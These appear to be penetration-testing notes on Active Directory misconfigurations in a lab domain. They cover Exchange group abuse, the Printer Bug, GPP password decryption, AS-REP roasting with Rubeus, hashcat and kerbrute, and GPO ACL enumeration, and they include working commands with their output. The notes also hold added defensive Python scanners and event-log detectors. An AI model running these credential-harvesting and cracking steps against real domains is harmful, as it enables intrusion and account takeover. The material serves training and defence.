Misconfigurations
Exchange Related Group Membership
In a default installation of Microsoft Exchange within an AD environment, Exchange is given many privileges within the domain. The group Exchange Windows Permissions is not listed as a protected group, but its members are given the ability to write a DACL to the domain object. An attacker can use this to add accounts to this group via a DACL misconfiguration.
More techniques can be found here
The Exchange group Organization Management is another powerful group that can access the mailboxes of all domain users. Sysadmins are usually members of this group. Compromising an Exchange server will often lead to Domain Admin privileges, and we should also be aware that dumping credentials from one will often yield hundreds of cleartext credentials or NTLM hashes.

PrivExchange
These attacks are flaws in the Exchange Server PushSubscription feature, which allows any domain user with a mailbox to force the Exchange server to authenticate to any host provided by the client over HTTP.
Printer Bug
A flaw in the MS-RPRN protocol (Print System Remote Protocol). To leverage this flaw, any domain user can connect to the spoolss named pipe with the RpcOpenPrinter method and the RpcRemoteFindFirstPrinterChangeNotificationEx method and force the server to authenticate to any host provided by the client over SMB.
Enumerating for MS-RPRN Printer Bug
We can use Get-SpoolStatus from the SecurityAssessment tool to check for vulnerable machines:
Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
MS14-068
A flaw in Kerberos which can be leveraged with standard domain user credentials to elevate privileges to Domain Admin. A Kerberos ticket contains information about a user, including the account name, ID, and group membership, in the Privilege Attribute Certificate (PAC). The PAC is signed by the KDC using secret keys to validate that the PAC has not been tampered with after creation. This flaw allowed a forged PAC to be accepted by the KDC as legitimate, so we can create a fake PAC presenting a user as a member of the Domain Admins or another privileged group. Tools such as the Python Kerberos Exploitation Kit (PyKEK) or the Impacket toolkit can be used to exploit this.
Sniffing LDAP Credentials
Many applications and printers store LDAP credentials in their web admin console to connect to the domain. These consoles often have weak or default passwords, and the stored credentials are sometimes even in cleartext. Some applications have a test function, which means we can gather credentials by changing the LDAP server IP address to the IP of our attack host.
Enumerating DNS Records
We can use https://github.com/dirkjanm/adidnsdump to enumerate all DNS records in a domain using a valid user account. By default, all users can list the child objects of a DNS zone in an AD environment; the tool uses this to resolve all records in the zone and tries to find something useful for our engagement.
Using adidnsdump
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 27 records
Viewing the Contents of the records file
head records.csv
type,name,value
?,LOGISTICS,?
AAAA,ForestDnsZones,dead:beef::7442:c49d:e1d7:2691
.....
Using the -r option to Resolve Unknown Records
If we run the tool with the -r option, it will attempt to resolve unknown records by performing an A query.
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 27 records
Password in Description Field
Sometimes sensitive information is found in the user account Description or Notes fields.
Finding Passwords in the Description Field
We can use PowerView to quickly search through large domains
Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}
PASSWD_NOTREQD Field
Some domain accounts may have the PASSWD_NOTREQD flag set. If this is found, it means the user could have a shorter password or no password set at all.
Checking for PASSWD_NOTREQD Setting
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
Credentials in SMB Shares and SYSVOL Scripts
The SYSVOL share can be a treasure trove of data, especially in large organizations. It may also contain various batch scripts within the scripts directory, and sometimes we can find very old scripts containing disabled accounts or old passwords.
Example Discovering an Interesting Script
ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
..
-a---- 3/8/2022 2:56 PM 979 reset_local_admin_pass.vbs
cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs
On Error Resume Next
strComputer = "."
Set oShell = CreateObject("WScript.Shell")
sUser = "Administrator"
sPwd = "!ILFREIGHT_L0cALADmin!"
Set Arg = WScript.Arguments
If Arg.Count > 0 Then
sPwd = Arg(0) 'Pass the password as parameter to the script
End if
'Get the administrator name
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
<SNIP>
Group Policy Preferences (GPP) Passwords
When a new GPP is created, an .xml file is created in the SYSVOL share, which is also locally cached on endpoints that the Group Policy applies to. These files include:
Map drives (drives.xml)
Create local users
Create printer config files (printers.xml)
Creating and updating services (services.xml)
Creating scheduled tasks (scheduledtasks.xml)
Changing local admin passwords.
They contain an array of configuration data and defined passwords.
The XML looks like the following

Decrypting the Password with gpp-decrypt
If we retrieve the cpassword value, we can decrypt it with gpp-decrypt
gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
Locating GPP Passwords with CME
GPP passwords can be located by searching the SYSVOL share or by using tools such as https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 and CrackMapExec.
crackmapexec smb -L | grep gpp
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
Using CME's gpp_autologin Module
We can also find passwords in files such as Registry.xml when autologon is configured via Group Policy.
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
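Added example for defenders, not part of the original notes or of CrackMapExec: legacy GPP XML files that still carry a cpassword attribute can be found by walking the SYSVOL Policies tree and inspecting every XML file in it. The Python below does that against a constructed Groups.xml (reusing the cpassword value quoted above) and a clean Drives.xml laid out in a temporary directory; the GPO GUID directory name is a placeholder.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed Groups.xml in the GPP layout; the cpassword value is the one quoted on this page.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="LocalAdmin" changed="2022-03-08 14:56:00">
  <Properties action="U" newName="" fullName="" description="pushed by GPP"
    cpassword="VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE" changeLogon="0"
    noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
</User></Groups>
"""
# Constructed Drives.xml with no stored credential: an empty cpassword is clean.
SAMPLE_DRIVES_XML = """<Drives><Drive name="S:" changed="2022-03-08 14:57:00">
  <Properties action="U" path="\\\\academy-ea-dc01\\share" label="Share" cpassword="" userName=""/>
</Drive></Drives>
"""

def find_cpasswords(root, source):
    """Return one finding per element that carries a non-empty cpassword attribute."""
    findings = []
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword")
        if cpw:  # cpassword="" means the preference item stores no password
            account = (elem.attrib.get("userName") or elem.attrib.get("runAs")
                       or elem.attrib.get("accountName") or "")
            findings.append({"source": source, "account": account, "cpassword": cpw})
    return findings

def scan_policies(policies_dir):
    """Walk a SYSVOL Policies tree and collect cpassword findings from every XML file in it."""
    findings = []
    for path in Path(policies_dir).rglob("*.xml"):
        try:
            root = ET.parse(path).getroot()  # honours the file's own encoding declaration
        except ET.ParseError:
            continue  # not well-formed XML; skip it
        findings.extend(find_cpasswords(root, str(path)))
    return findings

def demo():
    """Lay the samples out as Policies/<GUID>/Machine/Preferences/... in a temp dir and scan."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "{GPO-GUID-PLACEHOLDER}" / "Machine" / "Preferences"
        for sub, text in (("Groups", SAMPLE_GROUPS_XML), ("Drives", SAMPLE_DRIVES_XML)):
            (base / sub).mkdir(parents=True)
            (base / sub / f"{sub}.xml").write_text(text, encoding="utf-8")
        return scan_policies(tmp)
```

Point scan_policies at a mounted copy of \\<dc>\SYSVOL\<domain>\Policies to audit a real domain; any hit should be removed from the GPO and the account's password rotated.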
AS-REP Roasting
Occurs when a user account has the option "Does not require Kerberos preauthentication" set. The account does not need to provide valid identification before requesting a ticket.
Viewing an Account with the Do not Require Kerberos Preauthentication Option

Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser
We can use PowerView to enumerate users with their UAC value set to DONT_REQ_PREAUTH
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
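Added example, not part of the original notes: the description search, the PASSWD_NOTREQD check and the DONT_REQ_PREAUTH check above are all audits over the same user attributes. The Python below decodes the userAccountControl bitmask and scans description text over constructed user records in the shape of an LDAP export; the flag constants are the documented UAC bit values, while the account names and descriptions are made up.

```python
import re

# userAccountControl bit flags (the documented UAC attribute values).
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

# Words in a Description/Notes field that usually mean a credential was written down.
PASSWORD_HINT = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?)\b", re.IGNORECASE)

# Constructed user records in the shape of an LDAP export; names and text are made up.
SAMPLE_USERS = [
    {"samaccountname": "mmorgan", "useraccountcontrol": NORMAL_ACCOUNT | DONT_REQ_PREAUTH,
     "description": ""},
    {"samaccountname": "guest", "useraccountcontrol": NORMAL_ACCOUNT | PASSWD_NOTREQD | ACCOUNTDISABLE,
     "description": "Built-in guest"},
    {"samaccountname": "svc_ldap", "useraccountcontrol": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
     "description": "LDAP bind account, password is Welcome1"},
    {"samaccountname": "jdoe", "useraccountcontrol": "512", "description": "Sales team"},
]

def audit_user(user):
    """Return the issues found for one user record; an empty list means clean."""
    uac = int(user["useraccountcontrol"])  # exports often carry the value as a string
    issues = []
    if uac & DONT_REQ_PREAUTH:
        issues.append("DONT_REQ_PREAUTH set: AS-REP roastable")
    if uac & PASSWD_NOTREQD:
        state = "disabled" if uac & ACCOUNTDISABLE else "enabled"
        issues.append(f"PASSWD_NOTREQD set on {state} account: blank or short password allowed")
    desc = user.get("description") or ""
    if PASSWORD_HINT.search(desc):
        issues.append(f"description may contain a credential: {desc!r}")
    return issues

def audit_users(users):
    """Map samaccountname -> issues for every record with at least one finding."""
    report = {}
    for user in users:
        issues = audit_user(user)
        if issues:
            report[user["samaccountname"]] = issues
    return report
```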
Retrieving AS-REP in Proper Format with Rubeus
With Rubeus, we can try to obtain the ticket for the target account. If an attacker has GenericWrite or GenericAll permissions over an account, they can enable this attribute and obtain the AS-REP ticket for offline cracking to recover the account's password before disabling the attribute again.
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
Cracking the Hash with Hashcat
With the mode set to -m 18200, we can attempt to crack the hash:
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
Retrieving the AS-REP Using Kerbrute
This tool will automatically retrieve the AS-REP for any users found that do not require Kerberos pre-auth.
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 04/01/22 - Ronnie Flathers @ropnop
2022/04/01 13:14:17 > Using KDC(s):
2022/04/01 13:14:17 > 172.16.5.5:88
2022/04/01 13:14:17 > [+] VALID USERNAME: sbrown@inlanefreight.local
2022/04/01 13:14:17 > [+] mmorgan has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:400d306dda575be3d429aad39ec68a33$<SNIP>
...
Hunting for Users with Kerberos Pre-auth Not Required
With a valid list of users, we can use the below tool to hunt for all users with Kerberos pre-auth not required.
GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users
[-] User asanchez@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dlewis@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ccruz@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$mmorgan@inlanefreight.local@INLANEFREIGHT.LOCAL:47e0d517f2a5815da8345dd9247a0e3d$<SNIP>
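Added as a defender's counterpart, not part of the original notes: the AS-REP roasting and user enumeration shown above both leave traces in the domain controller's Security event 4768 (Kerberos authentication ticket requested). The Python below runs two checks over constructed 4768 records: a successful AS-REQ with no pre-authentication and an RC4 ticket (the 23 in the $krb5asrep$23$ hashes above is etype 0x17, RC4-HMAC), and a single source producing 0x6 KDC_ERR_C_PRINCIPAL_UNKNOWN failures for many distinct usernames, which is what a kerbrute-style userenum generates. Field names follow the event's XML data; all values are made up.

```python
from collections import defaultdict

# Constructed 4768 events; a failed AS-REQ is logged with PreAuthType "-" and etype 0xffffffff.
SAMPLE_4768 = [
    {"TargetUserName": "jdoe", "IpAddress": "172.16.5.40", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},      # normal: pre-auth, AES256
    {"TargetUserName": "mmorgan", "IpAddress": "172.16.5.225", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},      # no pre-auth, RC4: roastable
] + [
    {"TargetUserName": f"nosuch{i}", "IpAddress": "172.16.5.225", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"} for i in range(6)
]

# RC4-HMAC encryption types; the "23" in a $krb5asrep$23$ hash is etype 0x17.
RC4_ETYPES = {"0x17", "0x18"}

def asrep_roast_hits(events):
    """Successful 4768s issued without pre-authentication and with an RC4 ticket."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"].lower() in RC4_ETYPES]

def userenum_sources(events, threshold=5):
    """Source IPs whose 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) failures named >= threshold distinct users."""
    unknown = defaultdict(set)
    for e in events:
        if e["Status"] == "0x6":
            unknown[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: len(names) for ip, names in unknown.items() if len(names) >= threshold}
```

Both checks need the "Audit Kerberos Authentication Service" subcategory enabled for success and failure on the domain controllers; without failure auditing the 0x6 events are never written.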
Group Policy Object (GPO) Abuse
Group Policy provides admins with many advanced settings that can be applied to both user and computer objects in an AD environment. If we gain rights over a GPO via an ACL misconfiguration, we could leverage this for lateral movement, privilege escalation and even domain compromise.
GPO misconfigurations can be abused to perform the following attacks:
Adding additional rights to a user (such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeImpersonatePrivilege)
Adding a local admin user to one or more hosts
Creating an immediate scheduled task to perform any number of actions
Enumerating GPO Names with PowerView
We can use PowerView to enumerate GPO information and get a listing of GPOs by name
Get-DomainGPO |select displayname
Enumerating GPO Names with PowerShell
Get-GPO -All | Select DisplayName
Enumerating Domain User GPO Rights
We can check if a user has any rights over a GPO; a good first check is to see if the entire Domain Users group has any rights over one or more GPOs. We should look out for permissions such as WriteProperty and WriteDacl, as we can leverage these to give ourselves full control over the GPO.
$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
Converting GPO GUID to Name
We can get the display name of the GPO using the Get-GPO function:
Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532